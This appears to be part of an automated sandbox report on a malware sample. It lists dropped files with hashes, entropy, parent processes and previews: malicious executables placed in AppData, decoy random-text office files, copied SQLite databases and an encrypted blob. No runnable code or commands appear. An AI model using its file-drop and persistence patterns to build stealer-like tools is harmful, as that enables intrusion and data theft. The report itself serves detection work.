                                                                                                                                                                                                        Preview: EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EIVQSAOTAQ.xlsx
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.692024230831571
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                                                                                                                                                                        MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                                                                                                                                                                        SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                                                                                                                                                                        SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                                                                                                                                                                        SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EOWRVPQCCS.xlsx
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.692990330209164
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                                                                                                                                                                        MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                                                                                                                                                                        SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                                                                                                                                                                        SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                                                                                                                                                                        SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\KLIZUSIQEN.pdf
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.696703751818505
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                                                                                                                                        MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                                                                                                                                        SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                                                                                                                                        SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                                                                                                                                        SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\LFU3OHDJ
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):118784
                                                                                                                                                                                                        Entropy (8bit):0.4507667042986948
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:V/WU+bDoYysX0uhnydVjN9DLjGQLBE3u:V/l+bDo3irhnydVj3XBBE3u
                                                                                                                                                                                                        MD5:8D1E4EF2C47505BE17244F97D8591000
                                                                                                                                                                                                        SHA1:09EC63BD44834AC76F888D87C0A358532665D8B6
                                                                                                                                                                                                        SHA-256:A395EB3FFB419984F33F2AC9EE04A6257730A4600580812A5518957F50BB6D88
                                                                                                                                                                                                        SHA-512:B7EB3FE94FF62DD8D6BFEF55C0D79ABB2DAC65E30757E016B37CF78F29C27BDE89D0798CD21357B438EE4007D917AD830A11521DA3DC5C1988D73CBD9990FCD1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\OHVS0ZUA
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PALRGUCVEH.docx
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.696508269038202
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                        MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                        SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                        SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                        SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PALRGUCVEH.xlsx
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.696508269038202
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                        MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                        SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                        SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                        SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\sdiimdop.exe
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\18D.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14973440
                                                                                                                                                                                                        Entropy (8bit):4.645907802057032
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:+AH3plu5xWDwtTwKc6+9YwoTPxSeI2co8mfgWddddddddddddddddddddddddddt:+AH3pCxvTS6Wh6PIeI/
                                                                                                                                                                                                        MD5:F548B3529CA470C25E50AF6220AD3098
                                                                                                                                                                                                        SHA1:A241FBA1FD229664849616D3425AC80DA447583B
                                                                                                                                                                                                        SHA-256:B9029679671D745FEE6E41A455E8DAAC8D64FC9DA159416596D02736A544D4AB
                                                                                                                                                                                                        SHA-512:1E6C0914678E07D1DBCA262F57D88ED54E35E6B15AC4E5ADFE74EBB001D323BB45CEA47F1CCB9995BC65B02C00CEAE5ACE2AE3AF590829050963514351AA5CA7
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................C..........R..........................Rich............PE..L...15.`.................>...........+.......P....@.................................*(......................................<;..(.......`....................P..,#..`............................... ...@............................................text...n<.......>.................. ..`.data...H%...P.......B..............@....lave................X..............@....fidoce.K............Z..............@....pihudu..............\..............@....lafog...............^..............@....rsrc...`............l..............@..@.reloc...>...P......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\haifbcd
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):343040
                                                                                                                                                                                                        Entropy (8bit):6.634640145792183
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:5lA3X2bDueST6gKO1tqT7b4YlCTFGbGQ273pQGfT:5lA3X22e0VKYY70A4FOGQKt
                                                                                                                                                                                                        MD5:DC67C627917FF9724F3C1E6DB5F2DC27
                                                                                                                                                                                                        SHA1:4B7528999AD6095B3FBB3AEC059EFB88D999EA95
                                                                                                                                                                                                        SHA-256:26A4C5B36D9FDE80EA47137EB53B40DACF240432A5895F98417EAE51B6B681DA
                                                                                                                                                                                                        SHA-512:977AAB0AC60948315435E0698058598F40F42D7830B87EE7668BB209938CB388AA5B07C13B66C56DB1AFFA6F86A859B3C01666A22E437C808B6C9DB38975C7B0
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................C..........R..........................Rich............PE..L....(._.................@...................P....@.........................................................................l=..(.......`....................P..8#..`............................... ...@............................................text....>.......@.................. ..`.data...H%...P.......D..............@....bekuvox.............Z..............@....jutu...K............\..............@....vezev...............^..............@....mubone..............`..............@....rsrc...`............n..............@..@.reloc...>...P...@..................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\haifbcd:Zone.Identifier
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\scifbcd
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):358912
                                                                                                                                                                                                        Entropy (8bit):6.278717191933335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:7e+RhbrOOFh9v2Y8zBk3L3gXO1RdFggj:7e6aOFhB8zBk3L3b1R
                                                                                                                                                                                                        MD5:1F935BFFF0F8128972BC69625E5B2A6C
                                                                                                                                                                                                        SHA1:18DB55C519BBE14311662A06FAEECC97566E2AFD
                                                                                                                                                                                                        SHA-256:2BFA0884B172C9EAFF7358741C164F571F0565389AB9CF99A8E0B90AE8AD914D
                                                                                                                                                                                                        SHA-512:2C94C1EA43B008CE164D7CD22A2D0FF3B60A623017007A2F361BDFF69ED72E97B0CC0897590BE9CC56333E014CD003786741EB6BB7887590CB2AAD832EA8A32D
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k..S/.../.../...1.Z.=...1.L.W....6..*.../.......1.K.....1.[.....1.^.....Rich/...................PE..L...t..`.................<...J.......4.......P....@.................................A.......................................,9..<....0...Y.......................#..P...............................X...@............................................text...4:.......<.................. ..`.data...`....P.......@..............@....pamicak............................@....dos....K...........................@....modav..............................@....nugirof..... ......................@....rsrc....Y...0...Z..................@..@.reloc...>.......@...:..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\wratetu
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):248375
                                                                                                                                                                                                        Entropy (8bit):7.99937643116622
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:6144:IkACiiHYkyeqaRSZryvUV2l1UQpP3lNfoY6TA:4C1YkGaUFoSAR
                                                                                                                                                                                                        MD5:5CFC7301CEC69F9AA0EDF70A574D4436
                                                                                                                                                                                                        SHA1:F739E265A1CE0AE4F83E408CC9F52878541B3718
                                                                                                                                                                                                        SHA-256:B4F15FCE9A5739BC29C5F2A9A22ADC707EA244763D4D4E79199202C8180A33CC
                                                                                                                                                                                                        SHA-512:26A6FF5587FA2CDAA9381728AE8E91D45F5A45D51431CC9710D625C4330723E802FA8393619CCABE8303B6C1F046FE3F91C8F68CEF37680BDD1E56ECD14A5721
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: ..{P..8......{.....l.(aU..-...K@n.$.....R...Z>..V.f.~.N..?i.}............pg*#...4.9~>S...x.T.(c80J9&... >QUT./,O...J...yp.A.R.....|...tf..,A.9-......F...#j...........B..!...#...v..Y.-..e<...r....6.V\..I.w..&..}.2b....x.-.qw.C.8..i..#c46I.......^..D.&@Ye.).U.wK...2{l..s..~...........Ja..1......B....s.[..)<.k.nNn.3Qk...+a..6G.x..5Y.WY....U.{l..}...c........I.....0.}.#, rJ...,dht......6....rw.}.6j`/}.a/5,}..Z.%U.......qa.9.j(c.q.7..o..e.up.`.{.(o.*.....h....O........E..~..........bZ..Y.|.P.;..2..v#.0MV+.P.KW..8.90..l(.~..d.~wP.:..............dz.A...X..\ .5|V.|.if.(.2V7..l{J......M.ey..K..-..I..k ....V..z/mt......Ru..?C../K...;...D.}X...4~y.:=.H....J..`.){s...D.m!-.bv...D....=.....J.o..3..."{.^..7(@.H6........C.IL.#0m;.<9..+s..k....O....:X@|..+IR.g.Ja...L....yJ...xE.o1.P`.......5^U.M....a.(t.rVs.mG..5.A..B..Ar.2Zi..|.^G...p?m...V.s$..~b..........o.. ..r..|zO.y=.h.Y5...jc..ei...0.....T.t.[O.*...$.NX#.T//.NM....x...j..l.......\...3`.$.G.
                                                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
